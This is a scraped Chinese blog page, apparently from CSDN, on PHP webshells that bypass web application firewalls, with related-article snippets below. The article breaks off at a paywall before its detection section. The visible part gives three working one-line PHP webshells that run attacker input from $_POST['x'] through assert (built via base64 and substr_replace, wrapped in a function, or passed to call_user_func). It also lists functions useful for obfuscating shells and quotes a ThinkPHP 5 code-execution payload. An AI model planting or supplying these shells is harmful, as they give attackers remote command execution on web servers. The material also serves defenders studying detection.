PHP常见过waf webshell及最简单检测方法

最新推荐文章于 2024-05-19 23:37:32 发布
最新推荐文章于 2024-05-19 23:37:32 发布
阅读量1.4k 收藏 1
点赞数
分类专栏: python 文章标签: 程序员 互联网 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45084321/article/details/90488134
版权
本文探讨了PHP webshell如何绕过WAF,包括字符串变形、自写函数、回调函数、类利用等多种方法,并介绍了PHP webshell的检测方法,如机器学习、动态检测和静态规则匹配等,提供了实例分析和简单检测思路。
摘要由CSDN通过智能技术生成

为了验证该检测机制,首先了解下目前PHP webshell绕过WAF的方法。

 

常见绕过WAF的PHP webshell

字符串变形

大小写、编码、截取、替换、特殊字符拼接、null、回车、换行、特殊字符串干扰

<?php
$a = base64_decode("YXNzYXNz+00000____");
$a = substr_replace($a,"ert",3);
$a($_POST['x']);
?>

ucwords()
ucfirst()
trim()
substr_replace()
substr()
strtr()
strtoupper()
strtolower()
strtok()
str_rot13()
chr()
gzcompress()、gzdeflate()、gzencode()
gzuncompress()、gzinflate()、gzdecode()
base64_encode()
base64_decode()
pack()
unpack()

自写函数

利用 assert()

<?php 
function test($a){
    $a($_POST['x']);
}
test(assert);
?>

回调函数

<?php 
call_user_func(assert,array($_POST[x]));
?>

call_user_func_array()
array_filter() 
array_walk()  
array_map()
registregister_shutdown_function()
register_tick_function()
filter_var() 
filter_v
最低0.47元/天 解锁文章
程序员爽爽
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
如何使用Python准确查找PHP Webshell木马
BugHunterX的博客
10-03 97
在网络安全领域,Webshell木马是一种常见的威胁,攻击者可以使用它来获取对受攻击服务器的控制权。首先,我们需要遍历服务器上的PHP文件,然后对每个文件进行分析,以查找潜在的Webshell木马代码。函数打开每个PHP文件,并读取其内容。然后,我们可以编写自定义的分析逻辑,例如使用正则表达式或关键字匹配来查找潜在的Webshell木马代码。一旦我们获得了PHP文件列表,我们可以进一步分析每个文件,以查找潜在的Webshell木马。首先,我们需要遍历服务器上的PHP文件,并查找潜在的Webshell木马。
PHP常见waf webshell以及最简单检测方法
01-20
之前在Webshell查杀的新思路中留了一个坑 ,当时没有找到具体找到全部变量的方法,后来通过学习找到了个打印全部量的方法,并再次学习了下PHP webshell绕过WAF方法,以此来验证下此方法是否合理。 如有错误,还请...
Webshell检测绕过
m0_57798134的博客
08-17 557
webshell 概念。
WAF绕过(上)
最新发布
A526847的博客
05-19 642
或者$a=base64_decode("Y"."X"."N"."z"."Z"."X"."J"."0");自增运算:因为在PHP中,'a'++ => 'b','b'++ => 'c',所以我们如果得到了其中的一个字母,通过这个字符就可以得到 所有的字母。
利用工具改造webshell绕过WAF
永远是少年
02-01 1926
今天继续给大家介绍渗透测试相关知识,本文主要内容是利用工具改造webshell绕过WAF。 一、利用enphp改造webshell 二、利用网页版PHP加密改造webshell 三、利用webshell-venom改造webshell
php后门拿下当前目录
aici0819的博客
03-26 380
Weevely是一个模拟类似telnet的连接的隐形PHP网页shell。它是Web应用程序后期开发的必备工具,可以作为隐形后门程序,也可以作为一个web外壳来管理合法的Web帐户,甚至可以免费托管。 weevely是一款针对PHPwebshell的自由软件,可用于模拟一个类似于telnet的连接shell,weevely通常用于web程序的漏洞利用,隐藏后门或者使用类似tel...
深入浅出玩转php一句话(含过waf新姿势)
热门推荐
wjy397的专栏
01-10 1万+
本帖最后由 sucppVK 于 2017-1-9 14:39 编辑 一、前言 本文原创作者:XXX,本文属i春秋原创奖励计划,未经许可禁止转载! 各个论坛出了不少过waf的一句话 可笔者见还是有不少小白没有理解一句话(只知道是拿来链接菜刀) 今天打算做一篇面向初学者的教程,总结知识点,抛砖引玉。 让小白从彻底理解马的含义,到打造属于自己过waf的马。 ----
绕过WAF的另类webshell木马文件测试方法1
08-03
绕过WAF的另类webshell木马文件测试方法1
浅谈绕过WAF的数种方法.txt
07-18
**概述**:利用Request对象中的GET和POST方法进行特殊处理,从而绕过WAF检测。 **技术细节**: - 在ASP和ASP.NET环境中,可以通过构造特殊的Request对象来绕过WAF。例如,在ASP中可以使用`("t") %>`来获取`t`参数...
WAF绕过的各种方法总结.pdf
07-09
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
php免杀大马一句话,过主流waf
06-20
PHP语言异常灵活,日站的时候经常被waf拦截,于是花了点时间弄了个免杀的PHP大马,减小了体积,测试安全狗云锁阿里云360主机卫士全都过。上传换点积分。没积分的在这儿下 https://pan.baidu.com/s/1dF5rfVF
php WAF线下攻防用,模块化设计,功能可调,支持SQL AST分析
11-16
手工引用: 将Aegis.php与Aegis_lib.php放在同一目录,然后在防御目标的php文件头部加入<?php $AegisPHPName=__FILE__;include "/tmp/Aegis.php" ;?> 自动安装: 在本地的可以采用AegisManager进行本地安装或卸载,在服务端的用AegisInstaller.php与AegisUninst.php进行安装与卸载。 在防御成功显示图文的模式下,pic.jpg和music.mp3也需要与Aegis.php放在同一目录。 更多引用方式与配置方法请看注释。
网络攻防比赛PHP版本WAF
weixin_30932215的博客
04-14 1039
次去打HCTF决赛,用了这个自己写的WAFweb基本上没被打,被打的漏洞是文件包含漏洞,这个功能在本人这个waf里确实很是捉急,由于只是简单检测了..和php[35]{0,1},导致比赛由于文件包含漏洞web上失分了一次。不过现在不是很想去改进了。这个是比赛专用waf,商业价值几乎为0。 如果是框架写出的web就很好部署了,直接require在重写文件或者数据库文件中,如果是零散的p...
php webshell分析和绕过waf技巧
weixin_34033624的博客
12-15 232
前言WebShell是***者使用的恶意脚本,它的用途主要是在***后的Web应用程序上建立持久性的后门。webshell本身不能***或者利用远程漏洞,所以说它总是***的第二阶段,这个阶段我们经常称为post-exploitation。(PS:Post Exploitation是国外***测试标准里面的一个阶段)WebShell常用函数现在的Web应用程序基本上是采用PH...
初探机器学习检测 PHP Webshell
weixin_30673611的博客
08-30 512
简介 最近刷完了吴恩达(Andrew Ng)的Machine Learning课程,恰巧实验室有相关的需求,看了几个前辈的机器学习检测PHP Webshell 的文章,便打算自己也抄起袖子,在实战中求真知。 本文会详细的介绍实现机器学习检测PHP Webshell的思路和过程,一步一步和大家一起完成这个检测的工具,文章末尾会放出已经写好的下载链接。 可能需要的背景知识 ph...
WAF基础知识
u011975363的专栏
07-16 908
waf处理逻辑 取得用户请求数据 将数据与异常请求判定的正则进行匹配 发现请求有异常就进行拦截动作 waf部署方式 通过部署反向代理服务直接取得用户请求的http数据 通过硬件设备直接读取网络层数据在解析出用户请求的HTTP数据 通关读取网卡流量取得用户数据 ...
基于PHPWebshell自动检测刍议
weixin_34268610的博客
03-08 239
WotChin · 2015/12/31 14:510x00 引言看到wooyun知识库上众多大神的精彩文章,深感自身LOW到爆,故苦思冥想找来一个题目,主要求邀请码一枚,以便以后继续学习。对于网络维护人员来说,恐怕最头痛的就是网站被黑,还留下了后门,甚至连服务器都被提权。而Hacker通常在相对不易引人注目的地方留下后门。逐个排查感觉很吃力,那么,本文姑且探讨一下在PHP环境下的Webshell...
php一句话过waf春秋,【过waf篇】一句话木马如何优雅地过waf
weixin_35965051的博客
03-21 329
【过waf篇】一句话木马如何优雅地过waf0x00WAF简介作者:雨幕 微信公众号:异空间安全Web应用防护系统(也称:网站应用级入侵防御系统。英文:WebApplicationFirewall,简称:WAF)。利用国际上公认的一种说法:Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。Waf拦截一句话木马原理:以正则表达式匹配关键字判断是...
记一次有趣的tp5代码执行
weixin_30376323的博客
08-26 687
0x00 前言 朋友之前给了个站,拿了很久终于拿下,简单记录一下。 0x01 基础信息 漏洞点:tp 5 method 代码执行,payload如下 POST /?s=captcha _method=__construct&method=get&filter[]=assert&server[]=1&get[]=1 无回显,根据payload 成功判断目...
利用webshell流量检测实验演示各种php webshell变形方法WAF
07-28
对于利用webshell流量检测实验演示各种php webshell变形方法WAF的问题,根据引用\[1\]和引用\[2\]的内容,可以提供以下回答: Webshell是一种用于获取对服务器某种程度上的操作权限的工具,而php webshell是一种通过网站端口对网站服务器进行操作的权限。在绕过Web应用程序防火墙(WAF)的过程中,可以采用多种php webshell变形方法。 其中,管理权限拿webshell(进后台)的方法包括正常上传拿webshell、数据库备份拿webshell、突破本地验证拿webshell、上传其他脚本类型拿webshell、00截断拿webshell、利用解析漏洞拿webshell、利用编辑器拿webshell、网站配置插马拿webshell、通过编辑模板拿webshell、修改脚本直接拿webshell、数据库命令执行拿webshell、添加静态页面拿webshell、文件包含拿webshell方法。\[2\] 而普通权限拿webshell(不进后台)的方法包括0day拿webshell、修改网站上传类型配置来拿webshell、IIS写入权限拿webshell、远程命令执行拿webshell、上传漏洞拿webshell、SQL注入拿webshell方法。\[2\] 综上所述,利用webshell流量检测实验演示各种php webshell变形方法WAF的过程中,可以根据具体情况选择适合的方法来绕过WAF检测。 #### 引用[.reference_title] - *1* [PHP常见waf webshell以及最简单检测方法](https://blog.csdn.net/weixin_31900373/article/details/115193111)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [拿webshell基础方法总结](https://blog.csdn.net/m0_46230316/article/details/105644775)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值